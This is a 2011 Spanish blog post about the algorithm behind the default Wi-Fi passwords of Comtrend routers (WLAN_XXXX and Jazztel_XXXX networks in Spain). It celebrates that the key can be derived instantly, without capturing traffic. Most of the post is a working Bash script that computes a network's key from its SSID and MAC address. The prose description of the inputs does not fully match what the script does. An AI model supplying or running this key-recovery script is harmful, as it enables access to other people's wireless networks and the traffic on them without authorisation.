lunes, 21 de febrero de 2011

Por fin salió a la luz

A wireless iconImage via WikipediaDespués de perder toda esperanza en que la gente de SeguridadWireless publicara el algoritmo de generación de contraseñas por defecto de Comtrend (redes WLAN_XXXX y Jazztel_XXXX en España), algún hacker con curiosidad publicó a principios de este mes todos los detalles del mismo.

Básicamente consiste en generar el hash md5 de una cadena compuesta de la siguiente manera:

La subcadena bcgbghgg más 12345678ABCD siendo los 8 primeros carácteres coincidentes con la dirección MAC del router y los 4 últimos carácteres coincidentes con los 4 carácteres finales del SSID de la red.

Así de fácil y rápido. Ni capturar tráfico ni generar diccionarios. Bueno, sí, generas un diccionario de una sola entrada :)

Como muestra de implementación, un script en Bash sacado de Forocoches:

#!/bin/bash

echo CalcWLAN by a.s.r

if [ $# -ne 2 ]
then
echo "Usage: $0 "
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)

echo "La puta clave es $KEY"

Enhanced by Zemanta

No hay comentarios:

Publicar un comentario

Related Posts Plugin for WordPress, Blogger...